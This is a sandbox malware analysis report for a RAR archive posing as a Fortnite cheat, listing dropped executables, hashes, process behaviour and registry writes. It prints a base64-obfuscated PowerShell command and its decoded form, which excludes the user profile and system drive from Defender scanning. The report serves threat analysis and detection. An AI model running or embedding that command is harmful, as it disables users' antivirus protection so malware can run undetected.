Full analysis: https://app.any.run/tasks/6647ba90-93db-424e-b254-c072bb5e70ae
Verdict: Malicious activity
Analysis date: December 04, 2023, 20:54:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5: 2085BCA610F06504D9AAFB7D2E9F8D4F
SHA1: 73010D857E86E51B1BA2ADD2A416DB21862BE5B8
SHA256: 0A51C31FD94BD20A78FBB4C9756DFB127CBA780820BD802A90106C07D14F2FBF
SSDEEP: 98304:+n1pI63Su94umMUCAX4nMj8EEnGp0HoiNPTNdQdD+ueuA5CKewhH7XDQNpsHjABE:AIU5C3B4pRUysTo

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • fn_external.exe (PID: 1360)
      • fn_Chainwebruntimedllnet.exe (PID: 2764)
  • SUSPICIOUS

    • Reads the Internet Settings

      • fn_external.exe (PID: 1360)
    • Starts POWERSHELL.EXE for commands execution

      • fn_external.exe (PID: 1360)
    • Base64-obfuscated command line is found

      • fn_external.exe (PID: 1360)
    • BASE64 encoded PowerShell command has been detected

      • fn_external.exe (PID: 1360)
    • Powershell version downgrade attack

      • powershell.exe (PID: 1860)
  • INFO

    • Checks supported languages

      • fn_external.exe (PID: 1360)
      • fn_Chainwebruntimedllnet.exe (PID: 2764)
      • fortnite_inj.exe (PID: 240)
      • wmpnscfg.exe (PID: 2696)
    • Reads the computer name

      • fn_external.exe (PID: 1360)
      • fn_Chainwebruntimedllnet.exe (PID: 2764)
      • fortnite_inj.exe (PID: 240)
      • wmpnscfg.exe (PID: 2696)
    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 280)
    • Creates files or folders in the user directory

      • fn_external.exe (PID: 1360)
    • Reads the machine GUID from the registry

      • fn_Chainwebruntimedllnet.exe (PID: 2764)
      • fortnite_inj.exe (PID: 240)
    • Reads product name

      • fn_Chainwebruntimedllnet.exe (PID: 2764)
    • Reads Environment values

      • fn_Chainwebruntimedllnet.exe (PID: 2764)
    • Manual execution by a user

      • wmpnscfg.exe (PID: 2696)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
All screenshots are available in the full report
Total processes: 48
Monitored processes: 7
Malicious processes: 3
Suspicious processes: 1

Behavior graph

Graph nodes (in report order): winrar.exe (no specs), fn_external.exe (no specs), fn_external.exe, powershell.exe (no specs), fn_chainwebruntimedllnet.exe, fortnite_inj.exe (no specs), wmpnscfg.exe (no specs)

Process information

PID: 240
CMD: "C:\Users\admin\AppData\Roaming\fortnite_inj.exe"
Path: C:\Users\admin\AppData\Roaming\fortnite_inj.exe
Parent process: fn_external.exe
User:
admin
Integrity Level:
HIGH
Description:
temp
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\fortnite_inj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 280
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\darkFn+external+softaim.rar"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
PID: 1360
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\fn_external.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\fn_external.exe
Parent process: WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
0,0,0,0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb280.26435\fn_external.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
PID: 1860
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGwAZwBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAeAByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQB5ACMAPgA="
Decoded -EncodedCommand (UTF-16LE base64; the <#...#> blocks are empty PowerShell comments used as filler): <#mug#>Add-MpPreference <#lgh#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#uxr#> -Force <#ryy#>
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: fn_external.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2696
CMD: "C:\Program Files\Windows Media Player\wmpnscfg.exe"
Path: C:\Program Files\Windows Media Player\wmpnscfg.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
PID: 2764
CMD: "C:\Users\admin\AppData\Roaming\fn_Chainwebruntimedllnet.exe"
Path: C:\Users\admin\AppData\Roaming\fn_Chainwebruntimedllnet.exe
Parent process: fn_external.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3221225477 (0xC0000005, STATUS_ACCESS_VIOLATION)
Version:
16.10.31418.88
Modules
Images
c:\users\admin\appdata\roaming\fn_chainwebruntimedllnet.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
PID: 3676
CMD: "C:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\fn_external.exe"
Path: C:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\fn_external.exe
Parent process: WinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED)
Version:
0,0,0,0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exb280.26435\fn_external.exe
c:\windows\system32\ntdll.dll
Total events: 4 060
Read events: 3 958
Write events: 102
Delete events: 0

Modification events

(PID) Process: (280) WinRAR.exe
Key: HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E
Operation: write
Name: LanguageList
Value: en-US

(PID) Process: (280) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip

(PID) Process: (280) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip

(PID) Process: (280) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\Desktop\phacker.zip

(PID) Process: (280) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (280) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (280) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (280) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (280) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1

(PID) Process: (280) WinRAR.exe
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1
Executable files: 6
Suspicious files: 3
Text files: 0
Unknown types: 0

Dropped files

PID | Process | Filename | Type
2764 | fn_Chainwebruntimedllnet.exe | C:\Users\admin\Desktop\CBFkbTPP.log | (not given)
  MD5: (not given)  SHA256: (not given)
1360 | fn_external.exe | C:\Users\admin\AppData\Roaming\conhost_fn.exe | executable
  MD5: FB5CFCC8B57D03C4B0770350543BA89E  SHA256: 55E22D610F70DB44927E98825F8C8BD7E3CB14DE5C31723A9856580493952046
1360 | fn_external.exe | C:\Users\admin\AppData\Roaming\fn_Chainwebruntimedllnet.exe | executable
  MD5: 6630FB903553030ACE1B9F5F286974E8  SHA256: DA0393CEAA2EC3FBF6F36BACCB29EAE1EA6DE7F5543FC9B57D7F6DD029CB5CD4
280 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\fn_external.exe | executable
  MD5: C37BF945237887FC87702A6E496FFADD  SHA256: 8F3D885C17A6DF3F075E060873E7A9FE3B42B89EC4984608640ED49C182CEF94
1860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary
  MD5: 16F6D260068B85896C0EBB2E1B2A60D1  SHA256: 6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
1860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF214872.TMP | binary
  MD5: 16F6D260068B85896C0EBB2E1B2A60D1  SHA256: 6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
280 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$EXb280.26435\eac_bypass.dll | executable
  MD5: 612080028164B12939751DCCCBB68D4A  SHA256: E96030FDDAF7E78401567EE82480AD75EE48D3556199A3F85C0EC669EDAC2EF4
1860 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\029D7PSK8FE5CDYI8H9Y.temp | binary
  MD5: 16F6D260068B85896C0EBB2E1B2A60D1  SHA256: 6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984
1360 | fn_external.exe | C:\Users\admin\AppData\Roaming\fortnite_inj.exe | executable
  MD5: 4BE18B969A717E75252D52C86746C258  SHA256: FC90DC77B6BB5DC681FC3FCA150F3E65B3A687B0E249CBD277129D0D342BD0E1
2764 | fn_Chainwebruntimedllnet.exe | C:\Users\admin\Desktop\FsvbiPPI.log | executable
  MD5: D8BF2A0481C0A17A634D066A711C12E9  SHA256: 2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 0
TCP/UDP connections: 5
DNS requests: 0
Threats: 0

HTTP requests

No HTTP requests

Connections

PID | Process | IP:port | Domain | ASN | CN | Reputation
1080 | svchost.exe | 224.0.0.252:5355 | - | - | - | unknown
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
2588 | svchost.exe | 239.255.255.250:1900 | - | - | - | whitelisted

DNS requests

No data

Threats

No threats detected
No debug info